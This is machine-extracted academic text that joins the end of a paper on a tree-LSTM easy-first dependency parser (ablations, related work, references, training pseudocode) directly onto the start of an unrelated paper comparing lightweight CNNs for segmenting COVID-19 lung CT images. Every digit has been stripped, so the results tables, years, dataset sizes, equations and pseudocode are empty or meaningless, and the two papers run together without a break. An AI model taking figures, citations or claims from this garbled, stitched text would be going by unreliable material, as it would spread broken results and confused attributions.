for both parsers drop. the drop is small for english and large for chinese, and our parser seem to suffer a little less than the dyer et al model. importance of the dynamic oracle we also eval- uate the importance of using the dynamic oracle and error-exploration training, and find that they are in- deed important for achieving high parsing accura- cies with our model (table ). english chinese uas las uas las rand . . . . rand-nodyn . . . . ext . . . . ext-nodyn . . . . table : effect of the error-exploration training (dynamic-oracle) on dev set accuracy in english and chi- nese. rand: random initialization. ext: pre-trained ex- ternal embeddings. when training without error-exploration (that is, the parser follows only correct actions during train- ing and not using the dynamic aspect of the ora- cle), accuracies of unseen sentences drop by be- tween . and . accuracy points (average . ). this is consistent with previous work on training with error-exploration and dynamic oracles (gold- berg and nivre, ), showing that the technique is not restricted to models trained with sparse linear models. comparison to other state-of-the-art parsers our main point of comparison is the model of dyer et al, which was chosen because it is (a) a very strong parsing model; and (b) is the closest to ours in the lit- erature: a greedy parsing model making heavy use of lstms. to this end, we tried to make the com- parison to dyer et al as controlled as possible, using the same dependency annotation schemes, as well as the same predicted pos-tags and the pre-trained embeddings (when applicable). it is also informative to position our results with respect to other state-of-the-art parsing results re- ported in the literature, as we do in table . here, some of the comparisons are less direct: some of the results use different dependency annotation schemes , as well as different predicted pos-tags, and different pre-trained word embeddings. while the numbers are not directly comparable, they do give a good reference as to the expected range of our english parsing experiments use the stanford depen- dencies scheme, while other work use less informative depen- dency relations which are based on the penn malt converter, using the yamada and matsumoto head rules. from our expe- rience, this conversion is somewhat easier to parse, resulting in numbers which are about . - . points higher than stanford dependencies. state-of-the-art parsing results. our system’s en- glish parsing results are in range of state-of-the-art and the chinese parsing results surpass it. these numbers are achieved while using a greedy, bottom up parsing method without any search, and while relying solely on the compositional tree representa- tions. related work we survey two lines of related work: methods for encoding trees as vectors, and methods for parsing with vector representations. the popular approach for encoding trees as vec- tors is using recursive neural networks (goller and kuchler, ; socher et al., ; tai et al., ). recursive neural networks represent the vector of a parent node in a tree as a function of its chil- dren nodes. however, the functions are usually re- stricted to having a fixed maximum arity (usually two) (socher et al., ; tai et al., ; socher, ). while trees can be binarized to cope with the arity restriction, doing so results in deep trees which in turn leads to the vanishing gradient problem when training. to cope with the vanishing gradients, (tai et al., ) enrich the composition function with a gating mechanism similar to that of the lstm, resulting in the so-called tree-lstm model. an- other approach is to allow arbitrary arities but ignor- ing the sequential nature of the modifiers, e.g. by using a bag-of-modifiers representation or a convo- lutional layer (tai et al., ; zhu et al., ). in contrast, our tree encoding method naturally allows for arbitrary branching trees by relying on the well established lstm sequence model, and using it as a black box. very recently, zhang et al. ( ) pro- posed an rnn-based tree encoding which is similar to ours in encoding the sequence of modifiers as an rnn. unlike our bottom-up encoder, their method works top-down, and is therefore not readily appli- cable for parsing. on the other hand the top-down approach is well suited for generation. in future work, it could be interesting to combine the bottom- up and top-down approaches in an encoder-decoder framework (sutskever et al., ; kiros et al., ). work by dyer et al ( ), that was submit- ted in parallel to ours, introduces a similar lstm- based representation of syntactic constituents in the context of phrase-grammar parsing. in terms of parsing with vector representations, there are four dominant approaches: search based parsers that use local features that are fed to a neural-network classifier (pei et al., ; durrett and klein, ); greedy transition based parsers that use local features that are fed into a neural- network classifier (chen and manning, ; weiss et al., ), sometimes coupled with a node com- position function (dyer et al., ; watanabe and sumita, ); bottom up parsers that rely solely on recursively combined vector encodings of sub- trees (socher et al., ; stenetorp, ; socher et al., a); and parse-reranking approaches that first produce a k-best list of parses using a traditional parsing technique, and then score the trees based on a recursive vector encoding of each node (le and zuidema, ; le and zuidema, ; zhu et al., ). our parser is a greedy, bottom up parser that re- lies on compositional vector encodings of subtrees as its sole set of features. unlike the re-ranking ap- proaches, we do not rely on an external parser to provide k-best lists. unlike the bottom-up parser in (socher et al., ) that only parses sentences of up to words and the parser of (stenetorp, ) that achieves very low parsing accuracies, we parse ar- bitrary sentences with near state-of-the-art accuracy. unlike the bottom up parser in (socher et al., a) we do not make use of a grammar. the parser of (weiss et al., ) obtains exceptionally high re- sults using local features and no composition func- tion. the greedy version of their parser uses exten- sive tuning of hyper-parameters and network depth in order to squeeze every possible bit of accuracy. adding beam search on top of that further improves results. due to our much more limited resources, we did not perform a methodological search over hyper-parameters, and explored only a tiny space of the possible hyper-parameters, and our parser does not perform search. finally, perhaps closest to our approach is the greedy, transition-based parser of (dyer et al., ) that also works in a bottom- up fashion, and incorporates an lstm encoding of the input tokens and hierarchical vector composi- tion into its scoring mechanism. indeed, that parser obtains similar scores to ours, although we obtain somewhat better results when not using pre-trained embeddings. we differ from the parser of dyer et system method representation emb ptb-ym ptb-sd ctb runtime zhangnivre transition (beam) large feature set (sparse) – . – . o(n)+ martins graph, rd order+ large feature set (sparse) – . . – o(n ) pei graph, nd order large feature set (dense) – . – – o(n ) this work easyfirst (greedy) rec-lstm encoding – – . . o(n log n) weiss transition (greedy) large feature set (dense) yes – . – o(n) weiss transition (beam) large feature set (dense) yes – . – o(n)+ pei graph, nd order large feature set (dense) yes . – – o(n ) lezuidema reranking /blend inside-outside recursive net yes . . – o(n ) zhu reranking /blend recursive conv-net yes . – . o(n)+ this work easyfirst (greedy) rec-lstm encoding yes – . . o(n log n) table : parsing results (uas) of various state-of-the-art parsing systems on the english and chinese datasets. the systems that use embeddings use different pre-trained embeddings. english results use predicted pos tags (different systems use different taggers), while chinese results use gold pos tags. ptb-ym: english ptb, yamada and matsumoto head rules. ptb-sd: english ptb, stanford dependencies (different systems may use different versions of the stanford converter. ctb: chinese treebank. reranking /blend in method column indicates a reranking system where the reranker score is interpolated with the base-parser’s score. the reranking systems’ runtimes are those of the base parsers they use. o(n)+ indicates a linear-time system with a large multiplicative constant. the different systems and the numbers reported from them are taken from: zhangnivre : (zhang and nivre, ); martins : (martins et al., ); weiss (weiss et al., ); pei : (pei et al., ); lezuidema (le and zuidema, ); zhu : (zhu et al., ). al by having a more elaborate vector-composition function, relying solely on the compositional repre- sentations, and performing fully bottom-up parsing without being guided by a stack-and-buffer control structure. conclusions and future work we suggest a compositional vector representation of parse trees that relies on a recursive combination of recurrent-neural network encoders, and demonstrate its effectiveness by integrating it in a bottom-up easy-first parser. future extensions in terms of pars- ing include the addition of beam search, handling of unknown-words using character-embeddings, and adapting the algorithm to constituency trees. we also plan to establish the effectiveness of our hierar- chical tree-lstm encoder by applying it to more semantic vector representation tasks, i.e. training tree representation for capturing sentiment (socher et al., b; tai et al., ), semantic sentence similarity (marelli et al., ) or textual inference (bowman et al., ). acknowledgements this research is supported by the intel collaborative research institute for com- putational intelligence (icri-ci) and the israeli sci- ence foundation (grant number / ). references ian goodfellow yoshua bengio and aaron courville. . deep learning. book in preparation for mit press, http://www.deeplearningbook.org. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , lisbon, portugal, september. association for compu- tational linguistics. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. kyunghyun cho. . natural language under- standing with distributed representation. corr, abs/ . . michael collins. . three generative, lexicalised models for statistical parsing. in proceedings of the th annual meeting of the association for computa- tional linguistics, pages – , madrid, spain, july. association for computational linguistics. marie-catherine de marneffe and christopher d. man- ning. . stanford dependencies manual. techni- cal report, stanford university. greg durrett and dan klein. . neural crf parsing. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for com- putational linguistics. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. jason eisner. . three new probabilistic models for dependency parsing: an exploration. in th interna- tional conference on computational linguistics, pro- ceedings of the conference, coling , center for sprogteknologi, copenhagen, denmark, august - , , pages – . jason eisner. . bilexical grammars and their cubic- time parsing algorithms. advances in probabilistic and other parsing technologies. jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yoav goldberg and michael elhadad. . an effi- cient algorithm for easy-first non-directional depen- dency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguis- tics, pages – , los angeles, california, june. association for computational linguistics. yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg. . a primer on neural net- work models for natural language processing. corr, abs/ . . christoph goller and andreas kuchler. . learning task-dependent distributed representations by back- propagation through structure. in neural networks, ., ieee international conference on, volume , pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . ozan irsoy and claire cardie. . opinion mining with deep recurrent neural networks. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered composi- tion rivals syntactic methods for text classification. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations, san diego, california. ryan kiros, yukun zhu, ruslan salakhutdinov, richard s. zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in advances in neural information processing systems : annual conference on neural information processing systems , december - , , montreal, quebec, canada, pages – . sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, october. association for computational linguistics. phong le and willem zuidema. . the forest con- volutional network: compositional distributional se- mantics with a neural chart and without binarization. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal, september. association for computational linguistics. wang ling, chris dyer, alan w. black, and isabel tran- coso. . two/too simple adaptations of word vec for syntax problems. in naacl hlt , the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, denver, colorado, usa, may - june , , pages – . ji ma, tong xiao, jingbo zhu, and feiliang ren. . easy-first chinese pos tagging and dependency pars- ing. in proceedings of coling , pages – , mumbai, india, december. the coling organizing committee. ji ma, jingbo zhu, tong xiao, and nan yang. . easy-first pos tagging and dependency parsing with beam search. in proceedings of the st annual meet- ing of the association for computational linguistics (volume : short papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . marco marelli, luisa bentivogli, marco baroni, raf- faella bernardi, stefano menini, and roberto zampar- elli. . semeval- task : evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , dublin, ireland, august. association for compu- tational linguistics and dublin city university. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. ryan mcdonald. . discriminative training and spanning tree algorithms for dependency parsing. ph.d. thesis, university of pennsylvania. tomas mikolov, martin karafiát, lukás burget, jan cernocký, and sanjeev khudanpur. . re- current neural network based language model. in interspeech , th annual conference of the international speech communication association, makuhari, chiba, japan, september - , , pages – . wenzhe pei, tao ge, and baobao chang. . an ef- fective neural network model for graph-based depen- dency parsing. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee trans. signal processing, ( ): – . richard socher, christopher manning, and andrew ng. . learning continuous phrase representations and syntactic parsing with recursive neural net- works. in proceedings of the deep learning and unsupervised feature learning workshop of (nips) , pages – . richard socher, john bauer, christopher d. manning, and andrew y. ng. a. parsing with composi- tional vector grammars. in proceedings of the st annual meeting of the association for computational linguistics, acl , - august , sofia, bul- garia, volume : long papers, pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. b. recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. richard socher. . recursive deep learning for natural language processing and computer vision. ph.d. thesis, stanford university, august. pontus stenetorp. . transition-based dependency parsing using recursive neural networks. in deep learning workshop at the conference on neural information processing systems (nips), lake tahoe, nevada, usa, december. ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems : annual conference on neural information pro- cessing systems , december - , montreal, quebec, canada, pages – . kai sheng tai, richard socher, and christopher d. man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. stephen tratz and eduard hovy. . a fast, accurate, non-projective, semantically-enriched parser. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , edinburgh, scotland, uk., july. association for computational linguistics. taro watanabe and eiichiro sumita. . transition- based neural constituent parsing. in proceedings of the rd annual meeting of the association for com- putational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , honolulu, hawaii, october. association for computational lin- guistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon, usa, june. association for computational lin- guistics. xingxing zhang, liang lu, and mirella lapata. . tree recurrent neural networks with application to lan- guage modeling. corr, abs/ . . chenxi zhu, xipeng qiu, xinchi chen, and xuanjing huang. . a re-ranking model for dependency parser with recursive convolutional neural network. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. appendix: training algorithm pseudocode algorithm training on annotated corpus : input: sentences w , . . . ,wm : input: tree annotations t , . . . ,tm : input: number of epochs to train : v ← initializev ectors() : loss ← [] : for epoch ∈{ , . . . ,epochs} do : for s,t ∈{(w ,t ), . . . ,(wm,tm)} do : loss ← trainsentence(s,v [w , . . . ,wn],t,loss) : if |loss| > then : sumloss ← sum(loss) : call adam to minimize sumloss : loss ← [] (see algorithm , training of a single sentence, on next page.) algorithm training on a single sentence with dynamic oracle algorithm : function trainsentence(w,v,t,loss) : input: sentence w = w , . . . ,wn : input: vectors vi corresponding to inputs wi : input: annotated tree t in the form of (h,m,rel) triplets : input: list loss to which loss expressions are added : for i ∈ , . . . ,n do : unassigned[i] ←|children(wi)| : pend[i].id ← i : pend[i].el ← rnnl.init().append(vi) : pend[i].er ← rnnr.init().append(vi) : while |pend| > do : g,w ←{} ,{} : for (i,d,rel) ∈{ ≤ i < |pend|,d ∈{l,r},rel ∈ relations} do : if d = l then m,h ← pend[i], pend[i + ] : else m,h ← pend[i + ], pend[i] : if unassigned[m.id] = ∨∃` =rel(h,m,`) ∈ t then : w.append((h,m,rel)) : else g.append((h,m,rel)) : hg,mg,relg ← argmax(i,d,`)∈gscore(pend,i,d,`) : hw ,mw ,relw ← argmax(i,d,`)∈w score(pend,i,d,`) : scoreg ← score(hg,mg,relg) : scorew ← score(hw ,mw ,relw ) : if scoreg −scorew < then : h,m,rel,score ← hw ,mw ,relw ,scorew : else if scoreg −scorew > ∨random() < paug then : h,m,rel,score ← hg,mg,relg,scoreg : else : h,m,rel,score ← hw ,mw ,relw ,scorew : if scoreg −score < then : loss.append( −scoreg + score) : m.c = m.el ◦m.er : m.enc = g(w(m.c◦rel) + b) : if h.id < m.id then h.el.append(m.enc) : else h.er.append(m.enc) : unassigned[tparent(m).id] ← unassigned[tparent(m).id]− : pend.remove(m) : return loss performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images tharun j. iyer , alex noel joseph raj , sushil ghildiyal and ruban nersisson school of electrical engineering, vellore institute of technology, vellore, tamil nadu, india department of electronic engineering, shantou university, shantou, guangdong, china abstract the pandemic of coronavirus disease- (covid- ) has spread around the world, causing an existential health crisis. automated detection of covid- infections in the lungs from computed tomography (ct) images offers huge potential in tackling the problem of slow detection and augments the conventional diagnostic procedures. however, segmenting covid- from ct scans is problematic, due to high variations in the types of infections and low contrast between healthy and infected tissues. while segmenting lung ct scans for covid- , fast and accurate results are required and furthermore, due to the pandemic, most of the research community has opted for various cloud based servers such as google colab, etc. to develop their algorithms. high accuracy can be achieved using deep networks but the prediction time would vary as the resources are shared amongst many thus requiring the need to compare different lightweight segmentation model. to address this issue, we aim to analyze the segmentation of covid- using four convolutional neural networks (cnn). the images in our dataset are preprocessed where the motion artifacts are removed. the four networks are unet, segmentation network (seg net), high-resolution network (hr net) and vgg unet. trained on our dataset of more than , images, hr net was found to be the best performing network achieving an accuracy of . % and a dice score of . . the analysis shows that lightweight cnn models perform better than other neural net models when to segment infectious tissue due to covid- from ct slices. subjects algorithms and analysis of algorithms, artificial intelligence, emerging technologies keywords convolutional neural networks, computed tomography, covid- , segmentation, high-resolution network (hr net), segmentation network (seg net), unet, vgg-unet introduction during the winter months december , a highly contagious disease out broke in wuhan, china (zhu et al., ; liu et al., ). high grade fever and other flu like symptoms were noticed, and most of the patients developed pneumonia. the pathogen causing the disease was identified as corona virus, and named as severe acute respiratory how to cite this article iyer tj, joseph raj an, ghildiyal s, nersisson r. . performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published february corresponding author ruban nersisson, nruban@vit.ac.in academic editor marcin woźniak additional information and declarations can be found on page doi . /peerj-cs. copyright iyer et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nruban@�vit.�ac.�in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ syndrome corona virus- (sars-cov- ) (world health organization, ). the disease caused by the virus is named by world health organization (who) as corona virus disease (covid- ). who also declared covid spread as global public health emergency (world health organization, ). as of th may , more than countries around the world are affected by covid- . there are around million people affected by the disease worldwide with a mortality rate of % (around . million people lost their lives). developed countries like us, europe and most of the developing countries are suffering a lot from the outbreak. the scientific community is largely involved in devising an antidrug and vaccines for the device. but unfortunately there are no positive results till date and more over it is reported that, due to mutations, characteristics are changing which makes the vaccine development even more challenging. taking the situation into account, there are very few ways we can control the virus; like staying isolated from the world and breaking the spreading chain of the virus, maintaining the personal hygiene, early detection of the symptoms and taking necessary precautions are few of them. the successful control of the outbreak depends on the rapid and accurate detection and identification of the symptoms isolating the patient from the community, so that the spread of the disease can be stopped. currently, the method used for the detection is real-time reverse transcriptase polymerase chain reaction (rt-pcr) (li & xia, ). it is the standard procedure used by many hospitals and clinics for testing covid- cases. even though this method remains the reference standard, there are many reported false negative cases using this rt-pcr (chan et al., ), which is an alarming fact on the situation. it is also time consuming and the limited supply of rt-pcr kits for the rural areas make the testing more difficult (chen, yao & zhang, ). since the covid- patients develop breathe related discomfort and pneumonia as the outcome of the disease progress, radiological studies can play a vital role in diagnosing the lung infections caused by this episode (zu et al., ). the ct chest scan can be used to identify the early stages of lung infections and related problems. the chest ct reveals the initial pulmonary abnormalities for covid- patients for whom rt-pcr gave negative results (ai et al., ). also, to accurately and efficiently control the virus, studies have been conducted to implement forecasting models to predict the spread of covid- (wieczorek, siłka & woźniak, ). due to the nature of the problem being a regression problem to forecast the spread and predict how the virus may spread, artificial neural networks (anns) and recurrent neural networks (rnns) were used to model the data. data was collected from the center for systems science and engineering (csse) at johns hopkins university. to further improve the accuracy of prediction and decrease the error rate, deep learning was widely used as a predictor and forecasting model. generative adversarial networks (gans), extreme learning machine (elm), and long/short term memory (lstm) were some models used to predict the spread of the virus (jamshidi et al., ). the performance of the deep learning differed significantly from the use of rnns and anns. therefore, we decided to use deep learning methods in our study to explore the performance of models on our data. to approach the solution of using deep learning iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods to segment lung ct scans, we looked at studies conducted on detecting small nodules or lung tissue using complex neural networks. capizzi et al. ( ) used probabilistic neural networks and a bio-inspired reinforcement learning network based on fuzzy logic to accurately segment lung nodules. the network worked at . % accuracy and considerably lowered the computational demands of the detection and segmentation system. ke et al. ( ) proposed a neuro-heuristic algorithm to segment lung diseases from x-ray images. the algorithm achieved an average accuracy of . % to segment and classifies three diseases in the x-ray images. but for our study, ct scans were chosen as the primary source of data due to the easy availability and higher number of slices per scan. therefore, we would have more data than x-ray images. the common manifestations of sars-cov- in chest ct scan are ground glass opacities, consolidation, crazy paving, dilation of vessel width in some cases and round shape lesions in few cases (hamer et al., ; zu et al., ). the effectiveness of the chest ct scan based covid- management depends on the efficient automatic detection and segmentation of regions in the scan. so in that context, the recent developments in the imaging technologies come handy. there are plenty of imaging tools which give very high and accurate quantification of abnormal conditions. this procedure of image based diagnosis system involves capturing the image, analyzing the image by a trained, experienced radiologist and annotation is made for the ground truth segments. the current scenario slows down the annotation of the images, labeling and getting the ground truth processes due to the increasing number of patients day by day, lack of radiologist and the over duty burden of existing radiologists. therefore, automatically detecting the infected regions from the chest ct scan using computer based algorithms are the current trends in research that gives wonderful results and aids in medical diagnostics. the main objective of the research work is, comparing the segmentation performance of computationally non-intensive models deep learning model when subjected to lung ct scans for that are affected by covid- . the models utilized for the research belong to the u-net variants models which are the most popular models of choice for segmentation of medical images. here we compare the traditional u-net model as proposed by ronneberger with other variants such as seg net, u-net based on vgg and high resolution net (hr-net) and present both qualitative and quantitative results. materials and methods the block diagram describing the entire methodology is shown below in fig. . the description of each method is described below. dataset considered the used dataset consists of , images and their corresponding ground truths. a total of , training images are used and testing images are used. the ct scans of patients were taken from mosmed.ai (morozov et al., ) were openly accessible neuroimaging informatics technology initiative (nifti) images were provided. the data was collected from the research and practical clinical center for diagnostics and iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ telemedicine technologies of the moscow health care department. the ct scans were obtained between st march and th april . each nifti file was decompressed to png images and used for the study. the ct scans of another patients were taken from zenodo.org (jun et al., ) where the nifti files of patients were provided. the images were annotated by two radiologists and verified by an experienced radiologist. for both datasets, matlab was used to extract the png images. pre-processing the images in the dataset are riddled with motion artifacts and noise. motion artifacts are caused due to improper imaging techniques and are a specific kind of noise relevant to ct scans. therefore, removing this noise is important or else it will cause the algorithms to learn improperly. matlab is used to remove the noise and motion artifacts. the original image is converted to grayscale from rgb and then, the image properties are extracted. area and solidity are used and then, the image is thresholded after selecting the max area and highest solidity. once a mask is ready, the mask is multiplied with the original image to get the pre-processed image. a comparison is given below in fig. . as can be seen, motion artifacts are removed and the image has more clarity. other pre-processing methods to remove the noise and motion artifacts from lung ct images are using a mean filter (khan, ) and a series of region growing and morphological applications (devarapalli, kalluri & dondeti, ). these methods were mainly used to remove the sharp edges in the ct scans and to smoothen the image so that the network could learn better. but, on comparison of the different methods, our pre-processing method provided a better performance in all metrics hr net hrnet is developed at microsoft and has signified state of art presentation in the areas of semantic segmentation, image classification, facial detection, object detection and figure comparison between original image (a) and pre-processed image (b). full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pose estimation (sun et al., ). its attention is on training high resolution (hr) representation. the existing techniques recuperate representation of high resolution from representation of low resolution formed by high to low resolution network. in hrnet, from first stage commencement high-resolution network, progressively augment high to low resolution networks successively to arrange more steps and associate the multi- resolution network in parallel. hrnet is able of uphold high-resolution representation throughout the process as repeated multi-scale combinations are conducted by switching the information through the multi-resolution parallel subnetworks repeatedly throughout the process (sun et al., ). the architecture of resulting network is displayed in fig. . this network has advantages in contrast to existing networks like segnet, unet, hourglass etc. these existing networks lose a lot of essential information in the progression of recovering high-resolution from low-resolution representation. hrnet links high to low resolution networks in parallel instead of series and this gives high-resolution representation throughout the process, correspondingly the estimated heatmap is much accurate, spatially much precise. figure block diagram of proposed method. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-resolution sequential subnetwork existing models works by linking high to low resolution convolutions subnetwork in series, where each individual subnetwork form a platform, collection of an arrangement of convolutions furthermore, there is a down sample layer through end-to-end subnetworks to split the resolution into halves. let n sr be the subnet in the stage sth and resolution index r. first subnet resolution is given by r� . the high-to-low system with s phases/stages (i.e., ) can be indicated as: n ! n ! n ! n ( ) multi-resolution parallel subnetwork starting from first phase/stage begin with high resolution subnet, slowly enhance high to low resolution subnet, generating new phases/stages, and associate multi-resolution subnet in parallel. eventually, the parallel subnet resolution of a later phase/stage comprises of the resolution from an earlier stage and below one stage. the network shown below contains parallel subnets. ( ) figure architecture of hrnet. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-scale repeated fusion in this network exchange units were introduced throughout parallel subnet in such a way that an individual subnet continuously collects information from parallel subnets. how information is exchanged lets understand this process through an example here third stage is subdivided into multiple exchange blocks and every block consists of three parallel convolution modules, having exchange units followed by parallel units which is shown below: ( ) where: cbsr – convolution module, ebs – exchange unit, and s is the stage, r is the resolution and b is the block explanation of exchange units is show in fig. . the input mapping is given by: {x ; x ; x ; . . . ; xsg and the output mapping was given by: fy ; y ; y ; . . . ; ysg. the width and resolution of the output is same as input. every output is a sum of input mapping that is, yk ¼ ps i¼ aðxi; kÞ. assume of � stride was done for down sampling and for up sampling � convolution (nearest neighbor). hrnet experimental results (when tested with different datasets) show remarkable results for the applications like facial detection, semantic segmentation, and object detection. seg net at the university of cambridge, uk, team of the robotics group researched and developed that segnet is a deep encoder decoder architecture for multiclass pixel-wise segmentation (badrinarayanan, kendall & cipolla, ). the framework comprises order of non-linear processing layers which is called encoders and a similar set of decoders afterward a pixel wise classifier. generally, encoder have made up of a relu non-linearity and one or more convolutional layers with batch normalization, subsequently non- overlapping maxpooling and subsampling. using max-pooling indices in encoding sequence, for up sampling the sparse encoding in consequence the pooling process to the decoder. use of max-pooling indices in the decoders is the one important feature of the segnet to execute the sampling of low resolution maps. for segmented images the tendency to retain high frequency details and capable enough to decrease the number of iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameters in the decoder needed for training are some advantages of segnet. using stochastic gradient descent this framework can be trained end-to-end. segnet is composed of encoder and decoder after a last pixel-wise classification layer. the architecture is shown in fig. . the encoder in segnet is composed of convolution layers which are in number, and these layer matches with the starting layers of vgg , considered for classifying the objects (mannem, ca & ghosh, ). figure illustrates the decoding method utilized by segnet in which there is no learning engaged with the up-sampling stage. the upsampling of decoder network’s feature map (input) is done by learned maxpooling indices from the equivalent encoder feature map. dense feature maps are generated by combining feature maps and trainable decoder channel. segnet a deep network was used for semantic segmentation. basically, it was designed because the motivation behindhand was to propose an architecture for roads, outdoor and indoor sites which is proficient together in terms of computational time and memory. feature map’s maxpooling indices are only stored in segnet and to attain better performance it uses them in its decoder network. unet the unet design is based upon the fully convolution network and adjusted such that it produces better segmentation results in medical imaging. unet consists of two paths named as contracting and and expansive. in the contracting path it captures the context whereas in expansive path it enables exact localization. while contracting path is a classical figure layers of exchange unit of convolutions with various resolutions: (a) low, (b) medium and (c) high resolution. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ architecture of unet. it includes two × convolutions, max pooling operation with repeating application. the fig. illustrates the architecture of unet, which is u in shape that itself gives the name “unet”. the main philosophy behind this network is, it replace pooling operation by using upsampling operators (ronneberger, fischer & brox, ). so, ultimately the resolution will increase layer by layer. the main feature of unet is the figure segnet architecture. photograph source credit: google earth image, © google. full-size doi: . /peerj-cs. /fig- figure decoding techniques used by segnet. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ large number of channels which lead to higher resolution. moreover, in every downsampling it doubles the feature channels. each stage in the expansive path involves upsampling of the feature channel followed by ( × ) convolution that splits the number of feature channels into halves. in contracting path, it crops the feature map because of loss in border pixel in each convolution. final layer is mapped by × convolutions which is used to map all units feature vector. the network contains total convolutional layers. unet performs well on image 